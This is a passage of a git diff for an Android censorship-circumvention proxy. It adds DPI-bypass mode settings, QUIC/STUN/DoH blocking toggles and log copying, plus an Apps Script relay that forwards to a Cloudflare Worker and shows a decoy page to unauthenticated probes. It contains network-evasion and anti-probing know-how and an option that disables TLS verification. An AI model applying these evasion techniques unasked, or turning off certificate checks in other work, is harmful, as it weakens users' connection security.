@@ -783,7 +838,7 @@ private fun DeploymentIdsField(
 }
 
 // =========================================================================
-// Mode dropdown: apps_script (default) vs google_only (bootstrap).
+// Mode dropdown: apps_script (default), direct (no relay), or full.
 // =========================================================================
 
 @OptIn(ExperimentalMaterial3Api::class)
@@ -793,11 +848,11 @@ private fun ModeDropdown(
     onChange: (Mode) -> Unit,
 ) {
     val labelApps = "Apps Script (MITM)"
-    val labelGoogle = "Google-only (bootstrap)"
+    val labelDirect = "Direct (no relay)"
     val labelFull = "Full tunnel (no cert)"
     val currentLabel = when (mode) {
         Mode.APPS_SCRIPT -> labelApps
-        Mode.GOOGLE_ONLY -> labelGoogle
+        Mode.DIRECT -> labelDirect
         Mode.FULL -> labelFull
     }
     var expanded by remember { mutableStateOf(false) }
@@ -824,8 +879,8 @@ private fun ModeDropdown(
                     onClick = { onChange(Mode.APPS_SCRIPT); expanded = false },
                 )
                 DropdownMenuItem(
-                    text = { Text(labelGoogle) },
-                    onClick = { onChange(Mode.GOOGLE_ONLY); expanded = false },
+                    text = { Text(labelDirect) },
+                    onClick = { onChange(Mode.DIRECT); expanded = false },
                 )
                 DropdownMenuItem(
                     text = { Text(labelFull) },
@@ -837,8 +892,8 @@ private fun ModeDropdown(
         val help = when (mode) {
             Mode.APPS_SCRIPT ->
                 "Full DPI bypass through your deployed Apps Script relay."
-            Mode.GOOGLE_ONLY ->
-                "Bootstrap: reach *.google.com directly so you can open script.google.com and deploy Code.gs. Non-Google traffic goes direct."
+            Mode.DIRECT ->
+                "SNI-rewrite tunnel only — no relay. Reach *.google.com (and any configured fronting_groups) directly. Useful as a bootstrap to open script.google.com and deploy Code.gs."
             Mode.FULL ->
                 "All traffic tunneled end-to-end through Apps Script + remote tunnel node. No certificate needed."
         }
@@ -1142,6 +1197,25 @@ private fun AdvancedSettings(
             )
         }
 
+        // youtube_via_relay
+        Row(
+            verticalAlignment = Alignment.CenterVertically,
+            modifier = Modifier.fillMaxWidth(),
+        ) {
+            Column(modifier = Modifier.weight(1f)) {
+                Text(stringResource(R.string.adv_youtube_via_relay), style = MaterialTheme.typography.bodyMedium)
+                Text(
+                    stringResource(R.string.adv_youtube_via_relay_help),
+                    style = MaterialTheme.typography.labelSmall,
+                    color = MaterialTheme.colorScheme.onSurfaceVariant,
+                )
+            }
+            Switch(
+                checked = cfg.youtubeViaRelay,
+                onCheckedChange = { onChange(cfg.copy(youtubeViaRelay = it)) },
+            )
+        }
+
         // log_level dropdown
         var expanded by remember { mutableStateOf(false) }
         val levels = listOf("trace", "debug", "info", "warn", "error", "off")
@@ -1192,6 +1266,121 @@ private fun AdvancedSettings(
             )
         }
 
+        // Block QUIC toggle
+        Row(
+            verticalAlignment = Alignment.CenterVertically,
+            modifier = Modifier.fillMaxWidth(),
+        ) {
+            Column(modifier = Modifier.weight(1f)) {
+                Text(
+                    "Block QUIC",
+                    style = MaterialTheme.typography.bodyMedium,
+                )
+                Text(
+                    "Drop UDP/443 so browsers use TCP/HTTPS. QUIC over TCP tunnel causes meltdown.",
+                    style = MaterialTheme.typography.bodySmall,
+                    color = MaterialTheme.colorScheme.onSurfaceVariant,
+                )
+            }
+            Switch(
+                checked = cfg.blockQuic,
+                onCheckedChange = { onChange(cfg.copy(blockQuic = it)) },
+            )
+        }
+
+        // Block STUN/TURN toggle
+        Row(
+            verticalAlignment = Alignment.CenterVertically,
+            modifier = Modifier.fillMaxWidth(),
+        ) {
+            Column(modifier = Modifier.weight(1f)) {
+                Text(
+                    "Block STUN/TURN",
+                    style = MaterialTheme.typography.bodyMedium,
+                )
+                Text(
+                    "Reject STUN/TURN ports (3478/5349/19302). Forces WebRTC apps (Meet, WhatsApp) to TCP fallback — instant connect.",
+                    style = MaterialTheme.typography.bodySmall,
+                    color = MaterialTheme.colorScheme.onSurfaceVariant,
+                )
+            }
+            Switch(
+                checked = cfg.blockStun,
+                onCheckedChange = { onChange(cfg.copy(blockStun = it)) },
+            )
+        }
+
+        // Block DoH toggle
+        Row(
+            verticalAlignment = Alignment.CenterVertically,
+            modifier = Modifier.fillMaxWidth(),
+        ) {
+            Column(modifier = Modifier.weight(1f)) {
+                Text(
+                    "Block DoH",
+                    style = MaterialTheme.typography.bodyMedium,
+                )
+                Text(
+                    "Reject browser DoH — forces instant system DNS via tun2proxy. Saves ~1.5s per domain lookup.",
+                    style = MaterialTheme.typography.bodySmall,
+                    color = MaterialTheme.colorScheme.onSurfaceVariant,
+                )
+            }
+            Switch(
+                checked = cfg.blockDoh,
+                onCheckedChange = { onChange(cfg.copy(blockDoh = it)) },
+            )
+        }
+
+        // Bypass DoH toggle
+        Row(
+            verticalAlignment = Alignment.CenterVertically,
+            modifier = Modifier.fillMaxWidth(),
+        ) {
+            Column(modifier = Modifier.weight(1f)) {
+                Text(
+                    "Bypass DoH",
+                    style = MaterialTheme.typography.bodyMedium,
+                )
+                Text(
+                    "Send browser DoH direct, not through tunnel. Faster DNS — queries are still encrypted.",
+                    style = MaterialTheme.typography.bodySmall,
+                    color = MaterialTheme.colorScheme.onSurfaceVariant,
+                )
+            }
+            Switch(
+                checked = !cfg.tunnelDoh,
+                onCheckedChange = { onChange(cfg.copy(tunnelDoh = !it)) },
+                enabled = !cfg.blockDoh,
+            )
+        }
+
+        // Batch coalesce step slider
+        Column {
+            Text(
+                "Coalesce step: ${cfg.coalesceStepMs}ms",
+                style = MaterialTheme.typography.bodyMedium,
+            )
+            Slider(
+                value = cfg.coalesceStepMs.toFloat(),
+                onValueChange = { onChange(cfg.copy(coalesceStepMs = it.toInt().coerceIn(10, 500))) },
+                valueRange = 10f..500f,
+            )
+        }
+
+        // Batch coalesce max slider
+        Column {
+            Text(
+                "Coalesce max: ${cfg.coalesceMaxMs}ms",
+                style = MaterialTheme.typography.bodyMedium,
+            )
+            Slider(
+                value = cfg.coalesceMaxMs.toFloat(),
+                onValueChange = { onChange(cfg.copy(coalesceMaxMs = it.toInt().coerceIn(100, 2000))) },
+                valueRange = 100f..2000f,
+            )
+        }
+
         OutlinedTextField(
             value = cfg.upstreamSocks5,
             onValueChange = { onChange(cfg.copy(upstreamSocks5 = it)) },
@@ -1215,6 +1404,8 @@ private fun LiveLogPane() {
     val lines = remember { mutableStateListOf<String>() }
     val listState = rememberLazyListState()
     val scope = rememberCoroutineScope()
+    val clipboard = LocalClipboardManager.current
+    val ctx = LocalContext.current
 
     // Pull from the ring buffer periodically. We pull even while the
     // section is collapsed (cheap), so re-expanding shows fresh tail.
@@ -1244,24 +1435,41 @@ private fun LiveLogPane() {
                 color = MaterialTheme.colorScheme.onSurfaceVariant,
                 modifier = Modifier.weight(1f),
             )
-            TextButton(onClick = { lines.clear() }) { Text("Clear") }
+            TextButton(
+                enabled = lines.isNotEmpty(),
+                onClick = {
+                    clipboard.setText(AnnotatedString(lines.joinToString("\n")))
+                    Toast.makeText(
+                        ctx,
+                        ctx.getString(R.string.snack_logs_copied),
+                        Toast.LENGTH_SHORT,
+                    ).show()
+                },
+            ) { Text(stringResource(R.string.btn_copy)) }
+            TextButton(onClick = { lines.clear() }) { Text(stringResource(R.string.btn_clear)) }
         }
         Surface(
             color = MaterialTheme.colorScheme.surfaceVariant,
             shape = RoundedCornerShape(8.dp),
             modifier = Modifier.fillMaxWidth().heightIn(min = 160.dp, max = 320.dp),
         ) {
-            LazyColumn(
-                state = listState,
-                modifier = Modifier.padding(8.dp),
-            ) {
-                items(lines) { line ->
-                    Text(
-                        line,
-                        style = MaterialTheme.typography.bodySmall,
-                        fontFamily = FontFamily.Monospace,
-                        fontSize = 11.sp,
-                    )
+            // SelectionContainer makes log lines selectable for manual
+            // copy of partial ranges. Cross-line selection works within the
+            // currently rendered window; for "copy everything" the Copy
+            // button above is the reliable path.
+            SelectionContainer {
+                LazyColumn(
+                    state = listState,
+                    modifier = Modifier.padding(8.dp),
+                ) {
+                    items(lines) { line ->
+                        Text(
+                            line,
+                            style = MaterialTheme.typography.bodySmall,
+                            fontFamily = FontFamily.Monospace,
+                            fontSize = 11.sp,
+                        )
+                    }
                 }
             }
         }
@@ -1324,14 +1532,17 @@ private fun CollapsibleSection(
 /**
  * "Usage today (estimated)" card. Polls `Native.statsJson(handle)` every
  * second while the proxy is up and renders today's relay calls vs. the
- * Apps Script free-tier quota (20,000/day), today's bytes, UTC day key,
- * and a countdown to the 00:00 UTC reset. Also shows a "View quota on
- * Google" button that opens Google's Apps Script dashboard — the
- * authoritative number, since the client-side estimate only sees what
- * this device relayed.
+ * Apps Script free-tier quota (20,000/day), today's bytes, the Pacific
+ * Time day key, and a countdown to the 00:00 PT reset. Pacific Time
+ * matches Apps Script's actual quota reset cadence — UTC would have
+ * the counter resetting ~7-8 h before the user actually got a fresh
+ * quota allotment from Google. Also shows a "View quota on Google"
+ * button that opens Google's Apps Script dashboard — the authoritative
+ * number, since the client-side estimate only sees what this device
+ * relayed.
  *
  * Hidden when the handle is 0 (proxy not running) or the JSON comes back
- * empty (google_only / full-only configs don't run a DomainFronter and so
+ * empty (direct / full-only configs don't run a DomainFronter and so
  * have nothing to report).
  */
 @Composable
@@ -1400,7 +1611,7 @@ private fun UsageTodayCard() {
                 value = fmtBytes(todayBytes),
             )
             UsageRow(
-                label = stringResource(R.string.label_utc_day),
+                label = stringResource(R.string.label_pt_day),
                 value = todayKey,
             )
             UsageRow(
@@ -1457,6 +1668,104 @@ private fun UsageRow(label: String, value: String) {
     }
 }
 
+@Composable
+private fun PipelineDebugCard() {
+    val isRunning by VpnState.isRunning.collectAsState()
+    if (!isRunning) return
+
+    var json by remember { mutableStateOf("") }
+    LaunchedEffect(isRunning) {
+        if (!isRunning) return@LaunchedEffect
+        while (true) {
+            val result = withContext(Dispatchers.IO) {
+                runCatching { Native.pipelineDebugJson() }
+            }
+            json = result.getOrDefault("")
+            if (result.isFailure) {
+                android.util.Log.e("PipeDbg", "pipelineDebugJson failed", result.exceptionOrNull())
+            }
+            delay(500)
+        }
+    }
+
+    val obj = remember(json) {
+        if (json.isBlank()) null
+        else runCatching { JSONObject(json) }.getOrNull()
+    }
+    if (obj == null) return
+
+    val elevated = obj.optInt("elevated", 0)
+    val maxElevated = obj.optInt("max_elevated", 0)
+    val batches = obj.optInt("active_batches", 0)
+    val maxBatches = obj.optInt("max_batch_slots", 0)
+    val events = remember(json) {
+        val arr = obj.optJSONArray("events") ?: return@remember emptyList<String>()
+        (0 until arr.length()).map { arr.getString(it) }
+    }
+
+    Spacer(Modifier.height(8.dp))
+    ElevatedCard(modifier = Modifier.fillMaxWidth()) {
+        Column(
+            modifier = Modifier.padding(12.dp),
+            verticalArrangement = Arrangement.spacedBy(4.dp),
+        ) {
+            Text(
+                "Pipeline Debug",
+                style = MaterialTheme.typography.titleSmall,
+            )
+            Row(
+                modifier = Modifier.fillMaxWidth(),
+                horizontalArrangement = Arrangement.SpaceBetween,
+            ) {
+                Text("Elevated", style = MaterialTheme.typography.bodySmall)
+                Text(
+                    "$elevated / $maxElevated",
+                    style = MaterialTheme.typography.bodySmall,
+                    fontFamily = FontFamily.Monospace,
+                )
+            }
+            Row(
+                modifier = Modifier.fillMaxWidth(),
+                horizontalArrangement = Arrangement.SpaceBetween,
+            ) {
+                Text("Batches in-flight", style = MaterialTheme.typography.bodySmall)
+                Text(
+                    "$batches / $maxBatches",
+                    style = MaterialTheme.typography.bodySmall,
+                    fontFamily = FontFamily.Monospace,
+                )
+            }
+            if (events.isNotEmpty()) {
+                Spacer(Modifier.height(4.dp))
+                Text("Events", style = MaterialTheme.typography.labelSmall)
+                Box(
+                    modifier = Modifier
+                        .fillMaxWidth()
+                        .heightIn(max = 150.dp)
+                        .clip(RoundedCornerShape(4.dp))
+                        .background(MaterialTheme.colorScheme.surfaceVariant)
+                        .padding(6.dp)
+                ) {
+                    val listState = rememberLazyListState()
+                    LaunchedEffect(events.size) {
+                        if (events.isNotEmpty()) listState.animateScrollToItem(events.size - 1)
+                    }
+                    LazyColumn(state = listState) {
+                        items(events) { ev ->
+                            Text(
+                                ev,
+                                style = MaterialTheme.typography.bodySmall,
+                                fontFamily = FontFamily.Monospace,
+                                fontSize = 10.sp,
+                            )
+                        }
+                    }
+                }
+            }
+        }
+    }
+}
+
 private fun fmtBytes(b: Long): String {
     val k = 1024L
     val m = k * k
diff --git a/android/app/src/main/res/values-fa/strings.xml b/android/app/src/main/res/values-fa/strings.xml
index 36b25ae7..9421f805 100644
--- a/android/app/src/main/res/values-fa/strings.xml
+++ b/android/app/src/main/res/values-fa/strings.xml
@@ -24,11 +24,13 @@
     <string name="btn_test">تست</string>
     <string name="btn_add">افزودن</string>
     <string name="btn_clear">پاک</string>
+    <string name="btn_copy">کپی</string>
     <string name="btn_install">نصب</string>
     <string name="btn_cancel">انصراف</string>
 
     <!-- Field labels -->
     <string name="field_deployment_urls">آدرس‌(های) Deployment یا Script ID</string>
+    <string name="placeholder_paste_ids">یک URL/ID، یا چند مورد با خط جدید/فاصله/ویرگول/نقطه‌ویرگول جدا کنید</string>
     <string name="field_auth_key">کلید احراز (auth_key)</string>
     <string name="field_google_ip">google_ip</string>
     <string name="field_front_domain">دامنهٔ فرانت</string>
@@ -52,7 +54,7 @@
     <string name="lang_toggle_cd">تغییر زبان</string>
 
     <!-- Supporting / helper text -->
-    <string name="help_deployment_urls">URL کامل (https://script.google.com/macros/s/.../exec) یا فقط ID خام. چند ID به‌صورت چرخشی استفاده می‌شوند — بیشتر ID = سرعت بیشتر در حالت تونل کامل.</string>
+    <string name="help_deployment_urls">URL کامل (https://script.google.com/macros/s/.../exec) یا فقط ID خام. می‌توانید چند مورد را یک‌جا در فیلد افزودن جای‌گذاری کنید — با خط جدید/فاصله/ویرگول/نقطه‌ویرگول جدا می‌شوند. چند ID به‌صورت چرخشی استفاده می‌شوند — بیشتر ID = سرعت بیشتر در حالت تونل کامل.</string>
     <string name="help_auth_key">همان رمز مشترکی که داخل Apps Script گذاشتید.</string>
     <string name="help_mode_vpn_tun">هنگام اتصال، مجوز VPN سیستم درخواست می‌شود. تمام ترافیک دستگاه به‌صورت خودکار رد می‌شود.</string>
     <string name="help_mode_proxy_only">بدون VPN سیستم. بعد از اتصال، پروکسی Wi-Fi را روی 127.0.0.1:%1$d (HTTP) یا %2$d (SOCKS5) تنظیم کنید. فقط برنامه‌هایی که تنظیمات پروکسی را رعایت می‌کنند رد می‌شوند.</string>
@@ -65,6 +67,8 @@
     <!-- Advanced section -->
     <string name="adv_verify_tls">بررسی TLS طرف مقابل</string>
     <string name="adv_verify_tls_help">خاموش کردن، بررسی گواهی را برای لبهٔ گوگل غیرفعال می‌کند. فقط برای اشکال‌زدایی کاربرد دارد.</string>
+    <string name="adv_youtube_via_relay">ارسال یوتیوب از طریق رله</string>
+    <string name="adv_youtube_via_relay_help">ترافیک youtube.com / youtu.be / ytimg.com را به‌جای تونل SNI-rewrite از رلهٔ Apps Script عبور می‌دهد. حالت محدود را دور می‌زند ولی پخش ویدیو کندتر می‌شود.</string>
     <string name="adv_log_level">log_level</string>
     <string name="adv_parallel_relay">parallel_relay: %1$d</string>
     <string name="adv_parallel_relay_help">تعداد درخواست‌های موازی هر بار. ۱ عادی است؛ روی لینک‌های با افت، ۲-۳ را امتحان کنید.</string>
@@ -78,12 +82,13 @@
     <string name="snack_google_ip_updated">google_ip به %1$s به‌روزرسانی شد</string>
     <string name="snack_google_ip_current">google_ip قبلاً به‌روز است (%1$s)</string>
     <string name="snack_dns_lookup_failed">خطای DNS — اتصال شبکه را بررسی کنید</string>
+    <string name="snack_logs_copied">لاگ‌ها در کلیپ‌بورد کپی شدند</string>
 
     <!-- Usage today card -->
     <string name="sec_usage_today">مصرف امروز (تخمینی)</string>
     <string name="label_calls_today">درخواست‌های امروز</string>
     <string name="label_bytes_today">بایت امروز</string>
-    <string name="label_utc_day">روز (UTC)</string>
+    <string name="label_pt_day">روز (PT)</string>
     <string name="label_resets_in">ریست تا</string>
     <string name="usage_calls_of_quota">%1$d / %2$d  (%3$.1f%%)</string>
     <string name="usage_resets_hm">%1$d ساعت و %2$d دقیقه</string>
diff --git a/android/app/src/main/res/values/strings.xml b/android/app/src/main/res/values/strings.xml
index 8aa47b4c..6a7688e7 100644
--- a/android/app/src/main/res/values/strings.xml
+++ b/android/app/src/main/res/values/strings.xml
@@ -24,11 +24,13 @@
     <string name="btn_test">Test</string>
     <string name="btn_add">Add</string>
     <string name="btn_clear">Clear</string>
+    <string name="btn_copy">Copy</string>
     <string name="btn_install">Install</string>
     <string name="btn_cancel">Cancel</string>
 
     <!-- Field labels -->
     <string name="field_deployment_urls">Deployment URL(s) or script ID(s)</string>
+    <string name="placeholder_paste_ids">Paste one URL/ID, or many separated by newline / space / comma / semicolon</string>
     <string name="field_auth_key">auth_key</string>
     <string name="field_google_ip">google_ip</string>
     <string name="field_front_domain">front_domain</string>
@@ -52,7 +54,7 @@
     <string name="lang_toggle_cd">Switch language</string>
 
     <!-- Supporting / helper text -->
-    <string name="help_deployment_urls">Full URLs (https://script.google.com/macros/s/.../exec) or bare IDs. Multiple IDs are rotated round-robin — more IDs = more pipeline throughput in full mode.</string>
+    <string name="help_deployment_urls">Full URLs (https://script.google.com/macros/s/.../exec) or bare IDs. Paste many at once into the Add field — they\'ll be split on newline / space / comma / semicolon. Multiple IDs are rotated round-robin — more IDs = more pipeline throughput in full mode.</string>
     <string name="help_auth_key">The shared secret you set in the Apps Script.</string>
     <string name="help_mode_vpn_tun">Requests the OS VPN grant on Connect. All device traffic is routed automatically.</string>
     <string name="help_mode_proxy_only">No OS VPN. Set your Wi-Fi proxy to 127.0.0.1:%1$d (HTTP) or %2$d (SOCKS5) after Connect. Only apps that honour the proxy settings will tunnel.</string>
@@ -65,6 +67,8 @@
     <!-- Advanced section -->
     <string name="adv_verify_tls">Verify upstream TLS</string>
     <string name="adv_verify_tls_help">Off disables cert checks for the Google edge. Only useful for debugging.</string>
+    <string name="adv_youtube_via_relay">Send YouTube through relay</string>
+    <string name="adv_youtube_via_relay_help">Route youtube.com / youtu.be / ytimg.com through Apps Script relay instead of SNI-rewrite tunnel. Avoids restricted mode but slower for video.</string>
     <string name="adv_log_level">log_level</string>
     <string name="adv_parallel_relay">parallel_relay: %1$d</string>
     <string name="adv_parallel_relay_help">Fan-out per request. 1 is normal; bump to 2-3 on lossy links.</string>
@@ -74,16 +78,35 @@
     <!-- Live logs -->
     <string name="logs_lines_count">%1$d lines</string>
 
+    <!-- Config import/export -->
+    <string name="btn_import_clipboard">Paste config from clipboard</string>
+    <string name="btn_export_config">Export config</string>
+    <string name="btn_export_qr">Show QR code</string>
+    <string name="btn_scan_qr">Scan QR code</string>
+    <string name="btn_copy_hash">Copy to clipboard</string>
+    <string name="snack_config_imported">Config imported</string>
+    <string name="snack_config_copied">Config copied to clipboard</string>
+    <string name="snack_invalid_config">Invalid config in clipboard</string>
+    <string name="dialog_export_title">Export config</string>
+    <string name="dialog_export_warning">This includes your auth_key. Only share with people you trust.</string>
+    <string name="dialog_import_title">Import config?</string>
+    <string name="dialog_import_body">This will replace your current settings.</string>
+    <string name="label_camera_permission">Camera permission needed to scan QR codes</string>
+
     <!-- Snackbar -->
     <string name="snack_google_ip_updated">google_ip updated to %1$s</string>
     <string name="snack_google_ip_current">google_ip already current (%1$s)</string>
     <string name="snack_dns_lookup_failed">DNS lookup failed — check network</string>
+    <string name="snack_logs_copied">Logs copied to clipboard</string>
 
     <!-- Usage today card -->
     <string name="sec_usage_today">Usage today (estimated)</string>
     <string name="label_calls_today">calls today</string>
     <string name="label_bytes_today">bytes today</string>
-    <string name="label_utc_day">UTC day</string>
+    <!-- Pacific Time day key — Apps Script's UrlFetchApp quota
+         resets at midnight Pacific, not midnight UTC, so the day
+         label and the reset countdown both use PT. -->
+    <string name="label_pt_day">PT day</string>
     <string name="label_resets_in">resets in</string>
     <string name="usage_calls_of_quota">%1$d / %2$d  (%3$.1f%%)</string>
     <string name="usage_resets_hm">%1$dh %2$dm</string>
diff --git a/android/app/src/main/res/xml/file_paths.xml b/android/app/src/main/res/xml/file_paths.xml
new file mode 100644
index 00000000..1e63d103
--- /dev/null
+++ b/android/app/src/main/res/xml/file_paths.xml
@@ -0,0 +1,4 @@
+<?xml version="1.0" encoding="utf-8"?>
+<paths>
+    <cache-path name="shared" path="." />
+</paths>
diff --git a/assets/apps_script/Code.cfw.gs b/assets/apps_script/Code.cfw.gs
new file mode 100644
index 00000000..f455fe20
--- /dev/null
+++ b/assets/apps_script/Code.cfw.gs
@@ -0,0 +1,360 @@
+/**
+ * DomainFront Relay — Apps Script with Cloudflare Worker exit.
+ *
+ * Variant of Code.gs that off-loads the actual outbound HTTP fetch to
+ * a Cloudflare Worker. Apps Script becomes a thin auth-and-forward
+ * relay; Cloudflare does the work and pays the latency.
+ *
+ *   mhrv-rs ──► Apps Script (this file) ──► Cloudflare Worker ──► target
+ *               ▲ inbound auth & batch     ▲ outbound fetch + base64
+ *
+ * Wire protocol with mhrv-rs is identical to Code.gs:
+ *   1. Single:  POST { k, m, u, h, b, ct, r }       → { s, h, b }
+ *   2. Batch:   POST { k, q: [{m,u,h,b,ct,r}, ...] } → { q: [{s,h,b}, ...] }
+ *      Both shapes are forwarded to the Worker as one POST per call
+ *      from Apps Script: single mode posts {k, u, m, ...} once, batch
+ *      mode posts {k, q: [...]} once. The Worker fans out batches
+ *      internally via Promise.all. This is the design choice that
+ *      makes Code.cfw.gs actually save GAS UrlFetchApp quota — without
+ *      it we'd have to fetchAll(N worker calls) and end up at parity
+ *      with the standard Code.gs.
+ *
+ * Trade-off summary (read before deploying):
+ *   + Per-call latency drops from ~250-500 ms (Apps Script internal
+ *     hop) to ~10-50 ms (CF edge). Visibly snappier for chat-style
+ *     workloads (Telegram, page navigation).
+ *   + Apps Script *runtime* quota (90 min/day on consumer accounts)
+ *     stretches significantly because each call now spends almost all
+ *     its time in the network leg to the Worker, not in the body
+ *     fetch + base64 + header processing.
+ *   + Apps Script *UrlFetchApp count* quota stretches roughly Nx for
+ *     an N-URL batch because the batch is sent as a small number of
+ *     POSTs to the Worker (one per chunk of WORKER_BATCH_CHUNK URLs),
+ *     not fanned out per-URL via fetchAll. For mhrv-rs's typical
+ *     5-30 URL batches that's 1 GAS call (vs N under standard
+ *     Code.gs). Single non-batched requests still count 1:1.
+ *   - YouTube long-form streaming gets WORSE. Apps Script allows
+ *     ~6 min wall per execution; CF Workers cap at 30 s wall. The
+ *     SABR cliff hits sooner. For YouTube-heavy use, keep the
+ *     standard Code.gs (apps_script mode).
+ *   - Batch mode now has a per-batch wall, not per-URL: Promise.all
+ *     resolves only when every fetch finishes, so the slowest URL
+ *     dominates. mhrv-rs already retries failed batch items
+ *     individually, so failure modes are graceful, but it's a real
+ *     behavioural change vs Code.gs's per-URL fetchAll wall.
+ *   - Cloudflare anti-bot challenges on destination sites can be
+ *     stricter — exit IP is now in CF's own range, which CF's
+ *     anti-bot fingerprints as a worker-internal request. This is
+ *     a different problem than DPI bypass; not solved by either
+ *     variant.
+ *
+ * Deployment:
+ *   1. Deploy assets/cloudflare/worker.js to Cloudflare Workers first
+ *      (set its AUTH_KEY to a strong secret).
+ *   2. Note the *.workers.dev URL of that Worker.
+ *   3. Open https://script.google.com → New project, delete default code.
+ *   4. Paste THIS entire file.
+ *   5. Set AUTH_KEY (must match the Worker's AUTH_KEY and your mhrv-rs
+ *      config's auth_key — all three identical).
+ *   6. Set WORKER_URL to your *.workers.dev URL (must include https://).
+ *   7. Deploy → New deployment → Web app
+ *      Execute as: Me   |   Who has access: Anyone
+ *   8. Copy the Deployment ID into mhrv-rs config.json as "script_id".
+ *      mhrv-rs does not need to know about Cloudflare; it talks to
+ *      Apps Script the same way it always has.
+ *
+ * CHANGE THESE TWO CONSTANTS BELOW.
+ *
+ * Upstream credit for the GAS-→-Worker pattern: github.com/denuitt1/mhr-cfw.
+ * This file inherits the hardening (decoy-on-bad-auth, hop-loop guard)
+ * from the standard Code.gs.
+ */
+
+const AUTH_KEY = "CHANGE_ME_TO_A_STRONG_SECRET";
+
+// Full https://… URL of the Cloudflare Worker you deployed using
+// assets/cloudflare/worker.js. Must include the scheme.
+const WORKER_URL = "https://CHANGE_ME.workers.dev";
+
+// ── Sentinels — DO NOT EDIT ─────────────────────────────────
+// These two constants are NOT configuration. They are the literal
+// template-default values used by the fail-closed check in doPost so
+// that a forgotten edit (AUTH_KEY or WORKER_URL still set to the
+// placeholder) returns a loud error instead of silently accepting the
+// placeholder secret or POSTing to a bogus URL. Configure AUTH_KEY
+// and WORKER_URL above; leave these alone.
+const DEFAULT_AUTH_KEY = "CHANGE_ME_TO_A_STRONG_SECRET";
+const DEFAULT_WORKER_URL = "https://CHANGE_ME.workers.dev";
+
+// Must match the Worker's MAX_BATCH_SIZE. Batches larger than this
+// are split into chunks of this size and dispatched via fetchAll —
+// each chunk costs 1 GAS UrlFetchApp call, so an N-URL batch costs
+// ceil(N/CHUNK) calls (still much cheaper than the per-URL cost
+// under standard Code.gs's fetchAll).
+const WORKER_BATCH_CHUNK = 40;
+
+// Active-probing defense — same semantics as Code.gs. Bad-auth and
+// malformed POST bodies receive a decoy HTML page that looks like a
+// placeholder Apps Script web app instead of the JSON `{e}` error,
+// so probes can't fingerprint the deployment as a relay endpoint.
+// Flip to `true` only during initial setup if you need to debug an
+// "unauthorized" loop, then flip back before sharing the deployment.
+const DIAGNOSTIC_MODE = false;
+
+const SKIP_HEADERS = {
+  host: 1, connection: 1, "content-length": 1,
+  "transfer-encoding": 1, "proxy-connection": 1, "proxy-authorization": 1,
+  "priority": 1, te: 1,
+};
+
+const DECOY_HTML =
+  '<!DOCTYPE html><html><head><title>Web App</title></head>' +
+  '<body><p>The script completed but did not return anything.</p>' +
+  '</body></html>';
+
+// ── Request Handlers ────────────────────────────────────────
+
+function _decoyOrError(jsonBody) {
+  if (DIAGNOSTIC_MODE) return _json(jsonBody);
+  return ContentService
+    .createTextOutput(DECOY_HTML)
+    .setMimeType(ContentService.MimeType.HTML);
+}
+
+function doPost(e) {
+  try {
+    // Fail-closed if either constant is still the template default.
+    // Without this, a forgotten edit would either accept the placeholder
+    // secret as valid auth or POST to a literal "CHANGE_ME" URL — both
+    // are silent failure modes a deploy might miss. Surface them loud.
+    if (AUTH_KEY === DEFAULT_AUTH_KEY) {
+      return _json({ e: "configure AUTH_KEY in Code.cfw.gs" });
+    }
+    if (WORKER_URL === DEFAULT_WORKER_URL) {
+      return _json({ e: "configure WORKER_URL in Code.cfw.gs" });
+    }
+
+    var req = JSON.parse(e.postData.contents);
+    if (req.k !== AUTH_KEY) return _decoyOrError({ e: "unauthorized" });
+
+    if (Array.isArray(req.q)) return _doBatch(req.q);
+    return _doSingle(req);
+  } catch (err) {
+    return _decoyOrError({ e: String(err) });
+  }
+}
+
+function doGet(e) {
+  return ContentService
+    .createTextOutput(DECOY_HTML)
+    .setMimeType(ContentService.MimeType.HTML);
+}
+
+// ── Worker Forwarding ──────────────────────────────────────
+
+/**
+ * Strip headers that must not be forwarded (hop-by-hop / Apps-Script-
+ * managed). Returns a fresh header map; the input is never mutated.
+ */
+function _scrubHeaders(rawHeaders) {
+  var out = {};
+  if (rawHeaders && typeof rawHeaders === "object") {
+    for (var k in rawHeaders) {
+      if (rawHeaders.hasOwnProperty(k) && !SKIP_HEADERS[k.toLowerCase()]) {
+        out[k] = rawHeaders[k];
+      }
+    }
+  }
+  return out;
+}
+
+/**
+ * Normalize one request item into the shape the Worker expects.
+ * Used for both single and batch paths — single mode wraps this in
+ * `{k, ...item}`; batch mode wraps it in `{k, q: [item, ...]}`.
+ * Auth key is added at envelope level by callers, not per-item.
+ */
+function _normalizeItem(item) {
+  return {
+    u: item.u,
+    m: (item.m || "GET").toUpperCase(),
+    h: _scrubHeaders(item.h),
+    b: item.b || null,
+    ct: item.ct || null,
+    r: item.r !== false,
+  };
+}
+
+function _workerFetchOptions(payload) {
+  return {
+    url: WORKER_URL,
+    method: "post",
+    contentType: "application/json",
+    payload: JSON.stringify(payload),
+    muteHttpExceptions: true,
+    followRedirects: true,
+    validateHttpsCertificates: true,
+  };
+}
+
+// ── Single Request ─────────────────────────────────────────
+
+function _doSingle(req) {
+  if (!req.u || typeof req.u !== "string" || !req.u.match(/^https?:\/\//i)) {
+    return _json({ e: "bad url" });
+  }
+
+  var item = _normalizeItem(req);
+  var envelope = {
+    k: AUTH_KEY,
+    u: item.u,
+    m: item.m,
+    h: item.h,
+    b: item.b,
+    ct: item.ct,
+    r: item.r,
+  };
+  var opts = _workerFetchOptions(envelope);
+  // muteHttpExceptions covers HTTP-level errors (4xx/5xx come back as
+  // a normal HTTPResponse). It does NOT cover network-level failures
+  // — DNS resolution failure, TLS handshake failure, connection
+  // timeout to *.workers.dev, etc. — those throw. Catch and surface
+  // them as `{e}` so the operator debugging "why isn't my deployment
+  // responding?" gets a useful signal instead of the doPost outer
+  // catch returning the decoy HTML page (which makes the deployment
+  // look like a bad-auth probe to the client). Auth has already
+  // passed at this point so the probe-defence argument doesn't apply.
+  var resp;
+  try {
+    resp = UrlFetchApp.fetch(opts.url, opts);
+  } catch (err) {
+    return _json({ e: "worker unreachable: " + String(err) });
+  }
+  return _json(_parseWorkerJson(resp));
+}
+
+// ── Batch Request ──────────────────────────────────────────
+
+/**
+ * Forward a batch to the Worker, chunking when needed. Each chunk
+ * becomes ONE POST to the Worker; the Worker fans out across the URLs
+ * in the chunk via Promise.all and returns `{q: [...]}` in the same
+ * order. Multiple chunks fire in parallel via UrlFetchApp.fetchAll.
+ *
+ * Quota cost: ceil(N / WORKER_BATCH_CHUNK) GAS UrlFetchApp calls for
+ * an N-URL batch. For typical mhrv-rs batches of 5-30 URLs this is
